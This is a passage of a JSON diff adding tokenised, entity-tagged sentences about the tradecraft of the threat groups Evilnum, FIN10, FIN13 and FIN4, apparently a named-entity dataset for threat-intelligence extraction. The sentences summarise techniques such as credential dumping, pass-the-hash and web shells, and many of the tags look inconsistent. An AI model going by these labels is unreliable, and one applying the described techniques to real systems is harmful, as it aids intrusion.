+ "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "has", + "sent", + "spearphishing", + "emails", + "designed", + "to", + "trick", + "the", + "recipient", + "into", + "opening", + "malicious", + "shortcut", + "links", + "which", + "downloads", + "a", + ".LNK", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "has", + "used", + "the", + "malware", + "variant,", + "TerraTV,", + "to", + "run", + "a", + "legitimate", + "TeamViewer", + "application", + "to", + "connect", + "to", + "compromrised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "a", + "link", + "to", + "a", + "zip", + "file", + "hosted", + "on", + "Google", + "Drive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "can", + "steal", + "cookies", + "and", + "session", + "information", + "from", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Evilnum", + "has", + "used", + "a", + "component", + "called", + "TerraLoader", + "to", + "check", + "certain", + "hardware", + "and", + "file", + "information", + "to", + "detect", + "sandboxed", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "used", + "batch", + "scripts", + "and", + "scheduled", + "tasks", + "to", + "delete", + "critical", + "system", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "deployed", + "Meterpreter", + "stagers", + "and", + "SplinterRAT", + "instances", + "in", + "the", + "victim", + "network", + "after", + "moving", + "laterally." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "moved", + "laterally", + "using", + "the", + "Local", + "Administrator", + "account." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "uses", + "PowerShell", + "for", + "execution", + "as", + "well", + "as", + "PowerShell", + "Empire", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "established", + "persistence", + "by", + "using", + "the", + "Registry", + "option", + "in", + "PowerShell", + "Empire", + "to", + "add", + "a", + "Run", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "used", + "RDP", + "to", + "move", + "laterally", + "to", + "systems", + "in", + "the", + "victim", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "established", + "persistence", + "by", + "using", + "S4U", + "tasks", + "as", + "well", + "as", + "the", + "Scheduled", + "Task", + "option", + "in", + "PowerShell", + "Empire." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "used", + "Meterpreter", + "to", + "enumerate", + "users", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "relied", + "on", + "publicly-available", + "software", + "to", + "gain", + "footholds", + "and", + "establish", + "persistence", + "in", + "victim", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "used", + "stolen", + "credentials", + "to", + "connect", + "remotely", + "to", + "victim", + "networks", + "using", + "VPNs", + "protected", + "with", + "only", + "a", + "single", + "factor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN10", + "has", + "executed", + "malicious", + ".bat", + "files", + "containing", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "enumerated", + "all", + "users", + "and", + "their", + "roles", + "from", + "a", + "victim's", + "main", + "treasury", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "assigned", + "newly", + "created", + "accounts", + "the", + "sysadmin", + "role", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "compressed", + "the", + "dump", + "output", + "of", + "compromised", + "credentials", + "with", + "a", + "7zip", + "binary." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "obtained", + "administrative", + "credentials", + "by", + "browsing", + "through", + "local", + "files", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "IISCrack.dll", + "as", + "a", + "side-loading", + "technique", + "to", + "load", + "a", + "malicious", + "version", + "of", + "httpodbc.dll", + "on", + "old", + "IIS", + "Servers", + "(CVE-2001-0507)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "injected", + "fraudulent", + "transactions", + "into", + "compromised", + "networks", + "that", + "mimic", + "legitimate", + "behavior", + "to", + "siphon", + "off", + "incremental", + "amounts", + "of", + "money." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "gathered", + "stolen", + "credentials,", + "sensitive", + "data", + "such", + "as", + "point-of-sale", + "(POS),", + "and", + "ATM", + "data", + "from", + "a", + "compromised", + "network", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "leveraged", + "default", + "credentials", + "for", + "authenticating", + "myWebMethods", + "(WMS)", + "and", + "QLogic", + "web", + "management", + "interface", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "`certutil`", + "to", + "decode", + "base64", + "encoded", + "versions", + "of", + "custom", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "can", + "identify", + "user", + "accounts", + "associated", + "with", + "a", + "Service", + "Principal", + "Name", + "and", + "query", + "Service", + "Principal", + "Names", + "within", + "the", + "domain", + "by", + "utilizing", + "the", + "following", + "scripts:", + "`GetUserSPNs.vbs`", + "and", + "`querySpn.vbs`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "exploited", + "known", + "vulnerabilities", + "such", + "as", + "CVE-2017-1000486", + "(Primefaces", + "Application", + "Expression", + "Language", + "Injection),", + "CVE-2015-7450", + "(WebSphere", + "Application", + "Server", + "SOAP", + "Deserialization", + "Exploit),", + "CVE-2010-5326", + "(SAP", + "NewWeaver", + "Invoker", + "Servlet", + "Exploit),", + "and", + "EDB-ID-24963", + "(SAP", + "NetWeaver", + "ConfigServlet", + "Remote", + "Code", + "Execution)", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "gained", + "access", + "to", + "compromised", + "environments", + "via", + "remote", + "access", + "services", + "such", + "as", + "the", + "corporate", + "virtual", + "private", + "network", + "(VPN)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "the", + "Windows", + "`dir`", + "command", + "to", + "enumerate", + "files", + "and", + "directories", + "in", + "a", + "victim's", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "observed", + "the", + "victim's", + "software", + "and", + "infrastructure", + "over", + "several", + "months", + "to", + "understand", + "the", + "technical", + "process", + "of", + "legitimate", + "financial", + "transactions,", + "prior", + "to", + "attempting", + "to", + "conduct", + "fraudulent", + "transactions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "researched", + "employees", + "to", + "target", + "for", + "social", + "engineering", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "created", + "hidden", + "files", + "and", + "folders", + "within", + "a", + "compromised", + "Linux", + "system", + "`/tmp`", + "directory.", + "FIN13", + "also", + "has", + "used", + "`attrib.exe`", + "to", + "hide", + "gathered", + "local", + "host", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "downloaded", + "additional", + "tools", + "and", + "malware", + "to", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "a", + "proxy", + "tool", + "to", + "communicate", + "between", + "compromised", + "assets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "`Ping`", + "and", + "`tracert`", + "for", + "network", + "reconnaissance", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "logged", + "the", + "keystrokes", + "of", + "victims", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "obtained", + "memory", + "dumps", + "with", + "ProcDump", + "to", + "parse", + "and", + "extract", + "credentials", + "from", + "a", + "victim's", + "LSASS", + "process", + "memory", + "with", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "created", + "MS-SQL", + "local", + "accounts", + "in", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "the", + "following", + "temporary", + "folders", + "on", + "compromised", + "Windows", + "and", + "Linux", + "systems", + "for", + "their", + "operations", + "prior", + "to", + "exfiltration:", + "`C:\\Windows\\Temp`", + "and", + "`/tmp`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "tools", + "such", + "as", + "Incognito", + "V2", + "for", + "token", + "manipulation", + "and", + "impersonation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "custom", + "malware", + "to", + "maintain", + "persistence", + "in", + "a", + "compromised", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "scheduled", + "tasks", + "names", + "such", + "as", + "`acrotyr`", + "and", + "`AppServicesr`", + "to", + "mimic", + "the", + "same", + "names", + "in", + "a", + "compromised", + "network's", + "`C:\\Windows`", + "directory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "masqueraded", + "staged", + "data", + "by", + "using", + "the", + "Windows", + "certutil", + "utility", + "to", + "generate", + "fake", + "Base64", + "encoded", + "certificates", + "with", + "the", + "input", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "masqueraded", + "WAR", + "files", + "to", + "look", + "like", + "legitimate", + "packages", + "such", + "as,", + "wsexample.war,", + "wsexamples.com,", + "examples.war,", + "and", + "exampl3s.war." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "replaced", + "legitimate", + "KeePass", + "binaries", + "with", + "trojanized", + "versions", + "to", + "collect", + "passwords", + "from", + "numerous", + "applications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "harvested", + "the", + "NTDS.DIT", + "file", + "and", + "leveraged", + "the", + "Impacket", + "tool", + "on", + "the", + "compromised", + "domain", + "controller", + "to", + "locally", + "decrypt", + "it." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "`nmap`", + "for", + "reconnaissance", + "efforts.", + "FIN13", + "has", + "also", + "scanned", + "for", + "internal", + "MS-SQL", + "servers", + "in", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "executed", + "net", + "view", + "commands", + "for", + "enumeration", + "of", + "open", + "shares", + "on", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "searched", + "for", + "infrastructure", + "that", + "can", + "provide", + "remote", + "access", + "to", + "an", + "environment", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "the", + "PowerShell", + "utility", + "`Invoke-SMBExec`", + "to", + "execute", + "the", + "pass", + "the", + "hash", + "method", + "for", + "lateral", + "movement", + "within", + "an", + "compromised", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "enumerated", + "all", + "users", + "and", + "roles", + "from", + "a", + "victim's", + "main", + "treasury", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "PowerShell", + "commands", + "to", + "obtain", + "DNS", + "data", + "from", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "web", + "shells", + "and", + "Java", + "tools", + "for", + "tunneling", + "capabilities", + "to", + "and", + "from", + "compromised", + "assets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "Windows", + "Registry", + "run", + "keys", + "such", + "as,", + "`HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\hosts`", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "remotely", + "accessed", + "compromised", + "environments", + "via", + "Remote", + "Desktop", + "Services", + "(RDS)", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "leveraged", + "SMB", + "to", + "move", + "laterally", + "within", + "a", + "compromised", + "network", + "via", + "application", + "servers", + "and", + "SQL", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "remotely", + "accessed", + "compromised", + "environments", + "via", + "secure", + "shell", + "(SSH)", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "created", + "scheduled", + "tasks", + "in", + "the", + "`C:\\Windows`", + "directory", + "of", + "the", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "extracted", + "the", + "SAM", + "and", + "SYSTEM", + "registry", + "hives", + "using", + "the", + "`reg.exe`", + "binary", + "for", + "obtaining", + "password", + "hashes", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "collected", + "local", + "host", + "information", + "by", + "utilizing", + "Windows", + "commands", + "`systeminfo`,", + "`fsutil`,", + "and", + "`fsinfo`.", + "FIN13", + "has", + "also", + "utilized", + "a", + "compromised", + "Symantex", + "Altiris", + "console", + "and", + "LanDesk", + "account", + "to", + "retrieve", + "host", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "`nslookup`", + "and", + "`ipconfig`", + "for", + "network", + "reconnaissance", + "efforts.", + "FIN13", + "has", + "also", + "utilized", + "a", + "compromised", + "Symantec", + "Altiris", + "console", + "and", + "LanDesk", + "account", + "to", + "retrieve", + "network", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "`netstat`", + "and", + "other", + "net", + "commands", + "for", + "network", + "reconnaissance", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "publicly", + "available", + "tools", + "such", + "as", + "Mimikatz,", + "Impacket,", + "PWdump7,", + "ProcDump,", + "Nmap,", + "and", + "Incognito", + "V2", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "VBS", + "scripts", + "for", + "code", + "execution", + "on", + "comrpomised", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "used", + "HTTP", + "requests", + "to", + "chain", + "multiple", + "web", + "shells", + "and", + "to", + "contact", + "actor-controlled", + "C2", + "servers", + "prior", + "to", + "exfiltrating", + "stolen", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "obfuscated", + "and", + "open-source", + "web", + "shells", + "such", + "as", + "JspSpy,", + "reGeorg,", + "MiniWebCmdShell,", + "and", + "Vonloesch", + "Jsp", + "File", + "Browser", + "1.2", + "to", + "enable", + "remote", + "code", + "execution", + "and", + "to", + "execute", + "commands", + "on", + "compromised", + "web", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "leveraged", + "`xp_cmdshell`", + "and", + "Windows", + "Command", + "Shell", + "to", + "execute", + "commands", + "on", + "a", + "compromised", + "machine.", + "FIN13", + "has", + "also", + "attempted", + "to", + "leverage", + "the", + "‘xp_cmdshell’", + "SQL", + "procedure", + "to", + "execute", + "remote", + "commands", + "on", + "internal", + "MS-SQL", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "utilized", + "`WMI`", + "to", + "execute", + "commands", + "and", + "move", + "laterally", + "on", + "compromised", + "Windows", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN13", + "has", + "leveraged", + "`WMI`", + "to", + "move", + "laterally", + "within", + "a", + "compromised", + "network", + "via", + "application", + "servers", + "and", + "SQL", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "created", + "rules", + "in", + "victims'", + "Microsoft", + "Outlook", + "accounts", + "to", + "automatically", + "delete", + "emails", + "containing", + "words", + "such", + "as", + "“hacked,\"", + "\"phish,\"", + "and", + "“malware\"", + "in", + "a", + "likely", + "attempt", + "to", + "prevent", + "organizations", + "from", + "communicating", + "about", + "their", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "presented", + "victims", + "with", + "spoofed", + "Windows", + "Authentication", + "prompts", + "to", + "collect", + "their", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "captured", + "credentials", + "via", + "fake", + "Outlook", + "Web", + "App", + "(OWA)", + "login", + "pages", + "and", + "has", + "also", + "used", + "a", + ".NET", + "based", + "keylogger." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "lured", + "victims", + "to", + "launch", + "malicious", + "attachments", + "delivered", + "via", + "spearphishing", + "emails", + "(often", + "sent", + "from", + "compromised", + "accounts)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIN4", + "has", + "lured", + "victims", + "to", + "click", + "malicious", + "links", + "delivered", + "via", + "spearphishing", + "emails", + "(often", + "sent", + "from", + "compromised", + "accounts)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + 